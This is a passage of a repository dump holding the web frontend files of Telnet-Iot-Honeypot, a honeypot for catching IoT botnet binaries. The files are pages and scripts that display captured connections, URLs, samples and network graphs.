Islands\",\"NO\":\"Norway\",\"OM\":\"Oman\",\"PK\":\"Pakistan\",\"PW\":\"Palau\",\"PS\":\"Palestinian Territory, Occupied\",\"PA\":\"Panama\",\"PG\":\"Papua New Guinea\",\"PY\":\"Paraguay\",\"PE\":\"Peru\",\"PH\":\"Philippines\",\"PN\":\"Pitcairn\",\"PL\":\"Poland\",\"PT\":\"Portugal\",\"PR\":\"Puerto Rico\",\"QA\":\"Qatar\",\"RE\":\"Reunion\",\"RO\":\"Romania\",\"RU\":\"Russian Federation\",\"RW\":\"RWANDA\",\"SH\":\"Saint Helena\",\"KN\":\"Saint Kitts and Nevis\",\"LC\":\"Saint Lucia\",\"PM\":\"Saint Pierre and Miquelon\",\"VC\":\"Saint Vincent and the Grenadines\",\"WS\":\"Samoa\",\"SM\":\"San Marino\",\"ST\":\"Sao Tome and Principe\",\"SA\":\"Saudi Arabia\",\"SN\":\"Senegal\",\"CS\":\"Serbia and Montenegro\",\"SC\":\"Seychelles\",\"SL\":\"Sierra Leone\",\"SG\":\"Singapore\",\"SK\":\"Slovakia\",\"SI\":\"Slovenia\",\"SB\":\"Solomon Islands\",\"SO\":\"Somalia\",\"ZA\":\"South Africa\",\"GS\":\"South Georgia and the South Sandwich Islands\",\"ES\":\"Spain\",\"LK\":\"Sri Lanka\",\"SD\":\"Sudan\",\"SR\":\"Suriname\",\"SJ\":\"Svalbard and Jan Mayen\",\"SZ\":\"Swaziland\",\"SE\":\"Sweden\",\"CH\":\"Switzerland\",\"SY\":\"Syrian Arab Republic\",\"TW\":\"Taiwan, Province of China\",\"TJ\":\"Tajikistan\",\"TZ\":\"Tanzania, United Republic of\",\"TH\":\"Thailand\",\"TL\":\"Timor-Leste\",\"TG\":\"Togo\",\"TK\":\"Tokelau\",\"TO\":\"Tonga\",\"TT\":\"Trinidad and Tobago\",\"TN\":\"Tunisia\",\"TR\":\"Turkey\",\"TM\":\"Turkmenistan\",\"TC\":\"Turks and Caicos Islands\",\"TV\":\"Tuvalu\",\"UG\":\"Uganda\",\"UA\":\"Ukraine\",\"AE\":\"United Arab Emirates\",\"GB\":\"United Kingdom\",\"US\":\"United States\",\"UM\":\"United States Minor Outlying Islands\",\"UY\":\"Uruguay\",\"UZ\":\"Uzbekistan\",\"VU\":\"Vanuatu\",\"VE\":\"Venezuela\",\"VN\":\"Viet Nam\",\"VG\":\"Virgin Islands, British\",\"VI\":\"Virgin Islands, U.S.\",\"WF\":\"Wallis and Futuna\",\"EH\":\"Western Sahara\",\"YE\":\"Yemen\",\"ZM\":\"Zambia\",\"ZW\":\"Zimbabwe\", \"EU\": \"European Union\"};\n"
  },
  {
    "path": "html/fancy/connhash/index.html",
    "content": "<!doctype html>\n<html>\n<head>\n    <title>Network | Hierarchical layout</title>\n\n    <style type=\"text/css\">\n        body {\n            font: 10pt sans;\n        }\n\n        #mynetwork {\n            height: 800px;\n            border: 1px solid lightgray;\n        }\n    </style>\n\n    <script src=\"https://code.jquery.com/jquery-3.2.1.min.js\"></script>\n    <script src=\"http://visjs.org/dist/vis.js\"></script>\n\n    <link rel=\"stylesheet\" href=\"http://visjs.org/dist/vis-network.min.css\">\n\n    <script type=\"text/javascript\">\n        var nodes = [];\n        var edges = [];\n        var network = null;\n        var MAX   = 2000;\n\n        var nodes_dict = {};\n\n        function load() {\n          $.get(\"http://localhost:5000/connhashtree/20\", null, draw);\n        }\n\n        function processNode(node, level) {\n            c  = (MAX - node.count) / MAX * 255;\n            nodes.push({\n                \"level\": level,\n                \"id\":    node.connhash,\n                \"label\": node.count + \"\\n\" + node.text.replace(\"/bin/busybox\", \"\").substr(0, 32),\n                \"color\": \"rgb(\" + c + \",\" + c + \",\" + c + \")\"\n            });\n            nodes_dict[node.connhash] = node;\n            for (var i = 0; i < node.childs.length; i++) {\n                child    = node.childs[i];\n                edges.push({\n                    \"from\": node.connhash,\n                    \"to\":   child.connhash,\n                    \"color\": { 'color' : 'rgb(0,0,0)' }\n                });\n                processNode(child, level + 1);\n            }\n        }\n\n        function draw(data) {\n            data = JSON.parse(data);\n            console.log(data);\n            for (key in data) {\n                processNode(data[key], 0);\n            }\n\n            // create a network\n            var container = document.getElementById('mynetwork');\n            var options = {\n                layout: 
{\n                    hierarchical: {\n                        direction: \"UD\"\n                    }\n                }\n            };\n\n            data    = { \"edges\": edges, \"nodes\": nodes };\n            network = new vis.Network(container, data, options);\n\n            console.log(data);\n\n            // add event listeners\n            network.on(\"click\", function (params) {\n                if (params.nodes.length == 1)\n                {\n                    var node = nodes_dict[params.nodes[0]];\n                    window.location.href = \"http://localhost:5000/html/index.html#/connection/\" + node.sample_id;\n                }\n            });\n        }\n\n    </script>\n    \n</head>\n\n<body onload=\"load();\">\n<div id=\"mynetwork\"></div>\n</body>\n</html>\n\n"
  },
  {
    "path": "html/fancy/graph/index.html",
    "content": "<html>\n<head>\n\n<meta charset=\"utf-8\"/>\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n\n<script src=\"https://code.jquery.com/jquery-3.2.1.min.js\"></script>\n<script src=\"http://visjs.org/dist/vis.js\"></script>\n\n<link rel=\"stylesheet\" href=\"http://visjs.org/dist/vis-network.min.css\">\n<style type=\"text/css\">\n\n.code {\n\tfont-family: monospace;\n}\n\n.code-line.isinput {\n\tfont-weight: bold;\n}\n\n</style>\n<script src=\"../../apiurl.js\"></script>\n<script type=\"text/javascript\">\n\nvar ips        = {};\nvar conns      = {};\nvar urls       = {};\nvar samples    = {};\nvar graph_data = null;\nvar globalnode = null;\n\nfunction print(s)\n{\n  console.log(s);\n  //$(\"#logbox\").append(document.createTextNode( s + \"\\n\" ));\n}\n\nfunction getIPConns(ip, olderthan)\n{\n  var url = api + \"/connections?ip=\" + ip;\n  if (olderthan != null) url += \"&older_than=\" + olderthan + \"&\";\n  \n  $.get(url, null, function (data) {\n    print(\"IPconns: \" + ip + \", \" + olderthan);\n    var myconns = JSON.parse(data);\n    for (var i = 0; i < myconns.length; i++)\n    {\n      getConn(myconns[i].id);\n    }\n    if (myconns.length > 0)\n    {\n      var date = myconns[myconns.length - 1].date;\n      getIPConns(ip, date);\n    }\n  });\n}\n\nfunction getIP(ip, type)\n{\n  if (ip in ips)\n  {\n    return ips[ip];\n  } else {\n    print(\"New ip \" + ip);\n    ips[ip] = {\n      \"ip\":        ip,\n      \"conns\":     {},\n      \"neighbors\": {},\n      \"type\":      type\n    }\n\n    //getIPConns(ip, null);\n\n    return ips[ip];\n  }\n}\n\nfunction gotConn(conn)\n{\n  print(\"Conn:  \" + conn.id);\n\n  // Check if the connection has ANY edge\n  // associates/urls/samples\n  \n  //if (conn.urls.length == 0 && conn.conns_before.length == 0 && conn.conns_after.length == 0)\n  //{\n  //  return;\n  //}\n\n  conns[conn.id] = conn;\n  ip = getIP(conn.ip, \"ip\");\n  \n  for (var i = 0; i < 
conn.conns_before.length; i++)\n  {\n    assoc_id = conn.conns_before[i][\"id\"];\n    assoc_ip = getIP(conn.conns_before[i][\"ip\"], \"ip\");\n    print(\"Assoc: \" + assoc_id);\n\n    // Connect Associates Connections\n    ip.neighbors[assoc_ip.ip] = assoc_ip;\n    assoc_ip.neighbors[ip.ip] = ip;\n\n    ip.conns[conn.id] = conn;\n    //getConn(assoc_id);\n  }\n\n  // Connect Urls (Resolved IP)\n  for (var u = 0; u < conn.urls.length; u++)\n  {\n    var url    = conn.urls[u];\n    var urlid  = url.url; // url.ip;\n    if (urlid != null && urlid != \"\" ) //&& !url.url.startsWith(\"telnet://\"))\n    {\n      console.log(\"url \" + urlid);\n      var url_ip = getIP(urlid, \"url\");\n\n      // Conn <-> URL\n      ip.neighbors[url_ip.ip] = url_ip;\n      url_ip.neighbors[ip.ip] = ip;\n\n      // URL <-> Sample\n      if (url.sample != null) {\n        var sample_ip = getIP(url.sample, \"sample\");\n        url_ip.neighbors[sample_ip.ip] = sample_ip;\n        sample_ip.neighbors[url_ip.ip] = url_ip;\n      }\n    }\n  }\n}\n\nfunction getConn(id)\n{\n  if (!(id in conns))\n  {\n    $.get(api + \"/connection/\" + id, null, function (data) {\n      gotConn(JSON.parse(data));\n    });\n  }\n}\n\nfunction main()\n{\n  $.get(api + \"/connections\", null, function(data) {\n    var myconns = JSON.parse(data);\n    var max_id = myconns[1].id;\n\n    for (var i = 1; i <= max_id; i++)\n    {\n      getConn(i);\n    }\n  });\n}\n\nfunction addnode()\n{\n\tvar myid = \"\" + Math.random();\n\n\tgraph_data.nodes.add({\n\t\t\"id\":\t\tmyid,\n\t\t\"label\":\t\"newnewnew\" \n\t});\n\t\n\tgraph_data.edges.add({\n\t\t\"id\":   globalnode + \"-\" + myid,\n\t\t\"from\": globalnode,\n\t\t\"to\":   myid,\n\t});\n\t\n}\n\nfunction draw()\n{\n  var nodes = [];\n  var edges = [];\n  var edgeds_hash = {};\n  var nodes2ip = {}\n\n  var counter = 0;\n  for (ip_id in ips) {\n    ip = ips[ip_id];\n    ip.counter = counter;\n\n    nodes2ip[counter] = ip_id;\n\n    var color = \"#ccc\";\n    if 
(ip.type == \"url\") color = \"#77f\";\n    if (ip.type == \"sample\") color = \"#f77\";\n\n    nodes.push({\n      \"id\": counter,\n      \"label\": ip_id.substr(0,16),\n      \"color\": color\n    });\n    counter++;\n  }\n\n  for (ip_id in ips) {\n    ip = ips[ip_id];\n\n    for (nb_id in ip.neighbors)\n    {\n      nb = ips[nb_id];\n      if (!(nb.counter + \"-\" + ip.counter in edgeds_hash))\n      {\n        edges.push({from: ip.counter, to: nb.counter});\n        edgeds_hash[ip.counter + \"-\" + nb.counter] = true;\n      }\n    }\n  }\n\n  // create a network\n  var container = document.getElementById('mynetwork');\n  graph_data = {\n    nodes: new vis.DataSet(nodes),\n    edges: new vis.DataSet(edges)\n  };\n  var options = {\n    layout: {\n      improvedLayout: false\n    }\n  };\n  var network = new vis.Network(container, graph_data, options);\n  network.on(\"click\", function (params) {\n    if (params.nodes.length == 1)\n    {\n      globalnode = params.nodes[0];\n      //var newip = nodes2ip[params.nodes[0]];\n      //window.location.href = \"https://phype.pythonanywhere.com/#/connections?ip=\" + newip;\n    }\n  });\n}\n\n</script>\n\n</head>\n<body onload=\"main()\">\n\n<button onclick=\"draw()\">draw</button><button onclick=\"addnode()\">addnode</button>\n<div id=\"mynetwork\"></div>\n<pre id=\"logbox\">\n\n</pre>\n\n</body>\n</html>\n"
  },
  {
    "path": "html/img/LICENSE",
    "content": "Bee Icon by alican\nhttps://thenounproject.com/search/?q=bee&i=573797\nCC BY 3.0 (https://creativecommons.org/licenses/by/3.0/us/)\n"
  },
  {
    "path": "html/img/flags/LICENSE",
    "content": "Flag icons - http://www.famfamfam.com\n\nThese icons are public domain, and as such are free for any use (attribution appreciated but not required).\n\nNote that these flags are named using the ISO3166-1 alpha-2 country codes where appropriate. A list of codes can be found at http://en.wikipedia.org/wiki/ISO_3166-1_alpha-2\n\nIf you find these icons useful, please donate via paypal to mjames@gmail.com (or click the donate button available at http://www.famfamfam.com/lab/icons/silk)\n\nContact: mjames@gmail.com\n\n"
  },
  {
    "path": "html/index.html",
    "content": "<html>\n<head>\n\n<meta charset=\"utf-8\"/>\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n\n\n<link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css\">\n<link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/vis/4.21.0/vis-network.min.css\">\n\n<script src=\"https://code.jquery.com/jquery-3.2.1.slim.min.js\" integrity=\"sha256-k2WSCIexGzOj3Euiig+TlR8gA0EmPjuc79OEeY5L45g=\" crossorigin=\"anonymous\"></script>\n<script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\" integrity=\"sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa\" crossorigin=\"anonymous\"></script>\n\n<script src=\"https://cdnjs.cloudflare.com/ajax/libs/Chart.js/2.4.0/Chart.bundle.min.js\"></script>\n<script src=\"https://cdnjs.cloudflare.com/ajax/libs/vis/4.21.0/vis.min.js\"></script>\n\n<script src=\"https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js\"></script>\n<script src=\"https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular-route.js\"></script>\n\n<script src=\"https://cdn.jsdelivr.net/angular.chartjs/latest/angular-chart.min.js\"></script>\n<script src=\"js/angular-vis.js\"></script>\n\n<script src=\"common.js\"></script>\n<script src=\"apiurl.js\"></script>\n<script src=\"sample.js\"></script>\n<script src=\"countries.js\"></script>\n\n<style type=\"text/css\">\n\n.code {\n\tfont-family: monospace;\n}\n\n.code-line {\n\twhite-space: pre;\n}\n\n.code-line:hover {\n\twhite-space: pre;\n\tbackground-color: #ddd;\n}\n\n\n.code-line.isinput:hover {\n\tbackground-color: #fcc  ;\n}\n\n.code-line.isinput {\n    color: #a00;\n\tfont-weight: bold;\n}\n\n</style>\n\n</head>\n<body ng-app=\"honey\">\n\n<nav class=\"navbar navbar-default\">\n  <div class=\"container-fluid\">\n  \n    <!-- Brand and toggle get grouped for better mobile display -->\n    <div class=\"navbar-header\">\n      <button type=\"button\" 
class=\"navbar-toggle collapsed\" data-toggle=\"collapse\" data-target=\"#bs-example-navbar-collapse-1\" aria-expanded=\"false\">\n        <span class=\"sr-only\">Toggle navigation</span>\n        <span class=\"icon-bar\"></span>\n        <span class=\"icon-bar\"></span>\n        <span class=\"icon-bar\"></span>\n      </button>\n      \n      <a class=\"navbar-brand\" href=\"#/\" style=\"padding: 0\"><img src=\"img/icon.svg\" style=\"height: 2em; margin: 10px; display: float; float: left;\"><span style=\"margin: 15px 15px 15px 0px; display: float; float: left;\">Telnet-Iot-Honeypot</span></a>\n    </div>\n\n    <!-- Collect the nav links, forms, and other content for toggling -->\n    <div class=\"collapse navbar-collapse\" id=\"bs-example-navbar-collapse-1\">\n    \n      <ul class=\"nav navbar-nav\">\n        <li><a href=\"#/networks\">Networks</a></li>\n        <li><a href=\"#/urls\">Urls</a></li>\n        <li><a href=\"#/samples\">Samples</a></li>\n        <li><a href=\"#/connections\">Connections</a></li>\n        <li><a href=\"#/tags\">Tags</a></li>\n        <li><a href=\"#/admin\">Admin</a></li>\n      </ul>\n      \n    </div><!-- /.navbar-collapse -->\n  </div><!-- /.container-fluid -->\n</nav>\n\n<!-- GitHub fork button, placed at the top right -->\n<a href=\"https://github.com/Phype/telnet-iot-honeypot\" target=\"_blank\" class=\"hidden-xs\">\n\t<img style=\"position: absolute; top: 0; right: 0; border: 0;\" src=\"https://camo.githubusercontent.com/38ef81f8aca64bb9a64448d0d70f1308ef5341ab/68747470733a2f2f73332e616d617a6f6e6177732e636f6d2f6769746875622f726962626f6e732f666f726b6d655f72696768745f6461726b626c75655f3132313632312e706e67\" data-canonical-src=\"https://s3.amazonaws.com/github/ribbons/forkme_right_red_aa0000.png\">\n</a>\n\n<div class=\"container\">\n\t<div ng-view></div>\n</div>\n</body>\n</html>\n"
  },
  {
    "path": "html/js/angular-vis.js",
    "content": "angular.module('ngVis', [])\n\n    .factory('VisDataSet', function () {\n        'use strict';\n        return function (data, options) {\n            // Create the new dataSets\n            return new vis.DataSet(data, options);\n        };\n    })\n\n/**\n * TimeLine directive\n */\n    .directive('visTimeline', function () {\n        'use strict';\n        return {\n            restrict: 'EA',\n            transclude: false,\n            scope: {\n                data: '=',\n                options: '=',\n                events: '='\n            },\n            link: function (scope, element, attr) {\n                var timelineEvents = [\n                    'rangechange',\n                    'rangechanged',\n                    'timechange',\n                    'timechanged',\n                    'select',\n                    'doubleClick',\n                    'click',\n                    'contextmenu'\n                ];\n\n                // Declare the timeline\n                var timeline = null;\n\n                scope.$watch('data', function () {\n                    // Sanity check\n                    console.log(scope.data);\n                    if (scope.data == null) {\n                        return;\n                    }\n\n                    // If we've actually changed the data set, then recreate the graph\n                    // We can always update the data by adding more data to the existing data set\n                    if (timeline != null) {\n                        timeline.destroy();\n                    }\n\n                    // Create the timeline object\n                    console.log(scope.data);\n                    timeline = new vis.Timeline(element[0], scope.data.items, scope.data.groups, scope.options);\n\n                    // Attach an event handler if defined\n                    angular.forEach(scope.events, function (callback, event) {\n                        if 
(timelineEvents.indexOf(String(event)) >= 0) {\n                            timeline.on(event, callback);\n                        }\n                    });\n\n                    // onLoad callback\n                    if (scope.events != null && scope.events.onload != null &&\n                        angular.isFunction(scope.events.onload)) {\n                        scope.events.onload(timeline);\n                    }\n                });\n\n                scope.$watchCollection('options', function (options) {\n                    if (timeline == null) {\n                        return;\n                    }\n                    timeline.setOptions(options);\n                });\n            }\n        };\n    })\n\n/**\n * Directive for network chart.\n */\n    .directive('visNetwork', function () {\n        return {\n            restrict: 'EA',\n            transclude: false,\n            scope: {\n                data: '=',\n                options: '=',\n                events: '='\n            },\n            link: function (scope, element, attr) {\n                var networkEvents = [\n                    'click',\n                    'doubleclick',\n                    'oncontext',\n                    'hold',\n                    'release',\n                    'selectNode',\n                    'selectEdge',\n                    'deselectNode',\n                    'deselectEdge',\n                    'dragStart',\n                    'dragging',\n                    'dragEnd',\n                    'hoverNode',\n                    'blurNode',\n                    'zoom',\n                    'showPopup',\n                    'hidePopup',\n                    'startStabilizing',\n                    'stabilizationProgress',\n                    'stabilizationIterationsDone',\n                    'stabilized',\n                    'resize',\n                    'initRedraw',\n                    'beforeDrawing',\n                    
'afterDrawing',\n                    'animationFinished'\n\n                ];\n\n                var network = null;\n\n                scope.$watch('data', function () {\n                    // Sanity check\n                    if (scope.data == null) {\n                        return;\n                    }\n\n                    // If we've actually changed the data set, then recreate the graph\n                    // We can always update the data by adding more data to the existing data set\n                    if (network != null) {\n                        network.destroy();\n                    }\n\n                    // Create the network object\n                    network = new vis.Network(element[0], scope.data, scope.options);\n\n                    // Attach an event handler if defined\n                    angular.forEach(scope.events, function (callback, event) {\n                        if (networkEvents.indexOf(String(event)) >= 0) {\n                            network.on(event, callback);\n                        }\n                    });\n\n                    // onLoad callback\n                    if (scope.events != null && scope.events.onload != null &&\n                        angular.isFunction(scope.events.onload)) {\n                        scope.events.onload(network);\n                    }\n                });\n\n                scope.$watchCollection('options', function (options) {\n                    if (network == null) {\n                        return;\n                    }\n                    network.setOptions(options);\n                });\n            }\n        };\n    })\n\n/**\n * Directive for graph2d.\n */\n    .directive('visGraph2d', function () {\n        'use strict';\n        return {\n            restrict: 'EA',\n            transclude: false,\n            scope: {\n                data: '=',\n                options: '=',\n                events: '='\n            },\n            link: function (scope, element, 
attr) {\n                var graphEvents = [\n                    'rangechange',\n                    'rangechanged',\n                    'timechange',\n                    'timechanged',\n                    'finishedRedraw'\n                ];\n\n                // Create the chart\n                var graph = null;\n\n                scope.$watch('data', function () {\n                    // Sanity check\n                    if (scope.data == null) {\n                        return;\n                    }\n\n                    // If we've actually changed the data set, then recreate the graph\n                    // We can always update the data by adding more data to the existing data set\n                    if (graph != null) {\n                        graph.destroy();\n                    }\n\n                    // Create the graph2d object\n                    graph = new vis.Graph2d(element[0], scope.data.items, scope.data.groups, scope.options);\n\n                    // Attach an event handler if defined\n                    angular.forEach(scope.events, function (callback, event) {\n                        if (graphEvents.indexOf(String(event)) >= 0) {\n                            graph.on(event, callback);\n                        }\n                    });\n\n                    // onLoad callback\n                    if (scope.events != null && scope.events.onload != null &&\n                        angular.isFunction(scope.events.onload)) {\n                        scope.events.onload(graph);\n                    }\n                });\n\n                scope.$watchCollection('options', function (options) {\n                    if (graph == null) {\n                        return;\n                    }\n                    graph.setOptions(options);\n                });\n            }\n        };\n    })\n;\n\n"
  },
  {
    "path": "html/network.html",
    "content": "\n<h1>Network Info</h1>\n<div class=\"row\">\n\t<div class=\"col-md-6 col-xs-12\">\n\t\t<table class=\"table\">\n\n\t\t\t<tr><td>id</td><td><b>#{{ network.id }}</b></td></tr>\n\t\t\t<tr><td>Malware</td><td><b>{{ network.malware.name != null ? network.malware.name : fakenames[network.malware.id] }}</b> <a href=\"#/malware/{{ network.malware.id }}\">see</a></td></tr>\n\t\t\t<tr><td>Connections</td><td><b>{{ network.firstconns }} / {{ network.connections }}</b> from <b>{{ formatDate(network.firsttime) }}</b> to <b>{{ formatDate(network.lasttime) }}</b> <a href=\"#/connections?network_id={{ network.id }}\">see all</a></td></tr>\n\t\t\t<tr><td>Urls</td><td>{{ network.urls }}</td></tr>\n\t\t\t<tr><td>Samples</td><td>{{ network.samples }}</td></tr>\n\n\t\t</table>\n\t</div>\n\n\t<div class=\"col-md-6 col-xs-12\">\n\t\t<!--<h2>Connections from the Network <small><a href=\"#/connections?network_id={{ network.id }}\">see all</a></small></h2>-->\n\t\t<div style=\"height: 15em; width: 100%\">\n\t\t<canvas id=\"timechart\" class=\"chart chart-line\"\n\t\t\tchart-data=\"timechart_data\" chart-options=\"timechart_options\"\n\t\t\tchart-labels=\"timechart_labels\" chart-colors=\"timechart_colors\">\n\t\t</canvas>\n\t\t</div>\n\t\t<center><small><b>Initial Connections per Hour</b></small></center>\n\t</div>\n\n\t<div class=\"col-md-12 col-xs-12\">\n\t\t<h2>Connections by honeypot</h2>\n\t\t\n\t\t<table class=\"table table-condensed\">\n\t\t\t<tr>\n\t\t\t\t<th>Name</th>\n\t\t\t\t<th>Connections</th>\n\t\t\t</tr>\n\t\t\t<tr ng-repeat=\"(name, count) in network.honeypots\">\n\t\t\t\t<td>{{ name }}</td>\n\t\t\t\t<td>{{ count }}</td>\n\t\t\t</tr>\n\t\t</table>\n\t</div>\n\n\t<div class=\"col-md-12 col-xs-12\">\n\t\t<h2>Network graph <small><a ng-click=\"loadgraph()\">load graph</a></small></h2>\n\t\t<div style=\"width: 100%; height: 30em;\" ng-show=\"graph_enabled\">\n\t\t\t<vis-network data=\"graph_data\" options=\"graph_options\" 
events=\"graph_events\"></vis-network>\n\t\t</div>\n\t</div>\n</div>\n"
  },
  {
    "path": "html/networks.html",
    "content": "<h1>Networks</h1>\n\n<!--<h2>Connections from the Network <small><a href=\"#/connections?network_id={{ network.id }}\">see all</a></small></h2>-->\n\n<center><small><b>Initial Connections per Hour</b></small></center>\n<div style=\"height: 15em; width: 100%\">\n<canvas id=\"timechart\" class=\"chart chart-line\"\n\tchart-data=\"timechart_data\" chart-options=\"timechart_options\"\n\tchart-labels=\"timechart_labels\" chart-series=\"timechart_series\">\n</canvas>\n</div>\n\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>#</th>\n\t\t<th>Malware</th>\n\t\t<th>N⁰ initial Conn's</th>\n\t\t<!-- <th>No IPs</th> -->\n\t\t<th>N⁰ Urls</th>\n\t\t<th>N⁰ Samples</th>\n\t</tr>\n\t<tr ng-repeat=\"network in networks | filter:filterNoSamples | orderBy:'-order'\">\n\t\t<td><a href=\"#/network/{{ network.id }}\">#{{network.id}}</a></td>\n\t\t<td><a href=\"#/malware/{{ network.malware.id }}\">{{ network.malware.name != null ? network.malware.name : fakenames[network.malware.id] }}</a></td>\n\t\t<td>{{ network.firstconns }}</td>\n\t\t<!-- <td>{{ network.ips.length }}</td> -->\n\t\t<td>{{ network.urls }}</td>\n\t\t<td>{{ network.samples }}</td>\n\t</tr>\n\n</table>\n"
  },
  {
    "path": "html/overview.html",
    "content": "<img src=\"img/icon.svg\" style=\"height: 10em; margin-top: -4em; padding: 1em; background: white;\" class=\"pull-right\">\n\n<div class=\"page-header\">\n\t<h1>Telnet-Iot-Honeypot <small>Python honeypot for catching botnet binaries </small></h1>\n</div>\n\n<p>\n\tThis is the start page of this installation of the Telnet-Iot-Honeypot.<br>\n\tMore info: <a href=\"https://github.com/Phype/telnet-iot-honeypot\" target=\"_blank\">https://github.com/Phype/telnet-iot-honeypot</a>\n</p>\n\n<h2>Latest Urls</h2>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>Url</th>\n\t\t<th>Date</th>\n\t\t<th class=\"hidden-xs\">Sample</th>\n\t\t<th class=\"hidden-xs\">N⁰ Connections</th>\n\t</tr>\n\t<tr ng-repeat=\"url in urls | limitTo : 5\">\n\t\t<td><a href=\"{{ '#/url/' + encurl(url.url) }}\">{{ url.url }}</a></td>\n\t\t<td>{{ formatDate(url.date) }}</td>\n\t\t<td class=\"hidden-xs\"><span ng-show=\"url.sample != null\"><a href=\"{{ '#/sample/' + url.sample }}\">{{ short(url.sample, 16) }}</a></span></td>\n\t\t<td class=\"hidden-xs\">{{ url.connections }}</td>\n\t</tr>\n\n</table>\n\n<h2>Latest Samples</h2>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th class=\"hidden-xs\">SHA256</th>\n\t\t<th>Name</th>\n\t\t<th>Size (Bytes)</th>\n\t\t<th>First Seen</th>\n\t\t<th class=\"hidden-xs\">N⁰ Urls</th>\n\t</tr>\n\t<tr ng-repeat=\"sample in samples | limitTo : 3\">\n\t\t<td class=\"hidden-xs\"><span ng-show=\"sample.sha256 != null\"><a href=\"{{ '#/sample/' + sample.sha256 }}\">{{ short(sample.sha256, 16) }}</a></span></td>\n\t\t<td><a href=\"{{ '#/sample/' + sample.sha256 }}\">{{ sample.name }}</a></td>\n\t\t<td>{{ sample.length }}</a></td>\n\t\t<td>{{ formatDate(sample.date) }}</td>\n\t\t<td class=\"hidden-xs\">{{ sample.urls }}</td>\n\t</tr>\n\n</table>\n\n\n<h2>Latest Connections <small><a href=\"#/connections\">more</a></small></h2>\n\n<div class=\"row\">\n\t<div class=\"col-md-9 col-sm-12\">\n\n\t\t<table class=\"table 
table-condensed\">\n\n\t\t\t<tr>\n\t\t\t\t<th>Date</th>\n\t\t\t\t<th>Country</th>\n\t\t\t\t<!-- <th>IP</th> -->\n\t\t\t\t<th>Username</th>\n\t\t\t\t<th>Password</th>\n\t\t\t\t<th class=\"hidden-xs\">N⁰ Urls</th>\n\t\t\t</tr>\n\t\t\t<tr ng-repeat=\"connection in connections | limitTo : 8\">\n\t\t\t\t<td><a href=\"{{ '#/connection/' + connection.id }}\">{{ formatDate(connection.date) }}</a></td>\n\t\t\t\t<td><img src=\"img/flags/{{ connection.country.toLowerCase() }}.png\">  {{ connection.country }}</td>\n\t\t\t\t<!-- <td>{{ connection.ip }}</td> -->\n\t\t\t\t<td>{{ connection.user }}</a></td>\n\t\t\t\t<td>{{ connection.password }}</td>\n\t\t\t\t<td class=\"hidden-xs\">{{ connection.urls }}</td>\n\t\t\t</tr>\n\n\t\t</table>\n\t</div>\n\n\t<div class=\"col-sm-3 col-xs-1 hidden-md hidden-lg\"><!-- spacer --></div>\n\n\t<div class=\"col-md-3 col-sm-6 col-xs-10\">\n\t\t<canvas id=\"doughnut\" class=\"chart chart-doughnut\"\n\t\t\tchart-data=\"country_stats_values\" chart-labels=\"country_stats_labels\"\n\t\t\tchart-click=\"clickchart_countries\" chart-options=\"chart_options\">\n\t\t</canvas>\n\t\t<br>\n\t\t<center><small><b>All Connections by Country</b><br>Click on country to see all connections</small></center>\n\t</div>\n\n\t<div class=\"\">\n\t</div>\n</div>\n"
  },
  {
    "path": "html/sample.html",
    "content": "<h1>Sample Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>First seen</td><td>{{ formatDate(sample.date) }}</td></tr>\n\t<tr><td>First seen file name</td><td>{{ sample.name }}</td></tr>\n\t<tr><td>File size</td><td>{{ sample.length }} Bytes</td></tr>\n\t<tr><td>SHA256</td><td>{{ sample.sha256 }}</td></tr>\n\t<tr>\n\t\t<td>Virustotal result</a></td>\n\t\t<td>\n\t\t\t<a href=\"https://www.virustotal.com/latest-scan/{{ sample.sha256 }}\" target=\"_blank\" ng-show=\"sample.result != null\">\n\t\t\t\t<span class=\"glyphicon glyphicon-link\"></span> {{ sample.result }}\n\t\t\t</a>\n\t\t\t<span ng-show=\"sample.result == null\">Unknown, <a href=\"https://www.virustotal.com/latest-scan/{{ sample.sha256 }}\" target=\"_blank\">search yourself</a></span>\n\t\t</td>\n\t</tr>\n\t<tr><td>Network / Malware</td><td>\n\t\t<a href=\"#/network/{{ sample.network.id }}\">#{{ sample.network.id }}</a>\n\t\t<span> / </span>\n\t\t<a href=\"#/malware/{{ sample.network.malware.id }}\">{{ sample.network.malware.name != null ? sample.network.malware.name : fakenames[sample.network.malware.id] }}</a>\n\t</td></tr>\n\n</table>\n\n<h2>Download Info</h2>\n\n<pre>{{ sample.info }}</pre>\n\n<h2>Downloaded from</h2>\n\n<table class=\"table\">\n\n\t<tr>\n\t\t<th>Url</th>\n\t\t<th>Date</th>\n\t\t<th>N⁰ Connections</th>\n\t</tr>\n\t<tr ng-repeat=\"url in sample.urls\">\n\t\t<td><a href=\"{{ '#/url/' + encurl(url.url) }}\">{{ url.url }}</a></td>\n\t\t<td>{{ formatDate(url.date) }}</td>\n\t\t<td>{{ url.connections.length }}</td>\n\t</tr>\n\n</table>\n"
  },
  {
    "path": "html/sample.js",
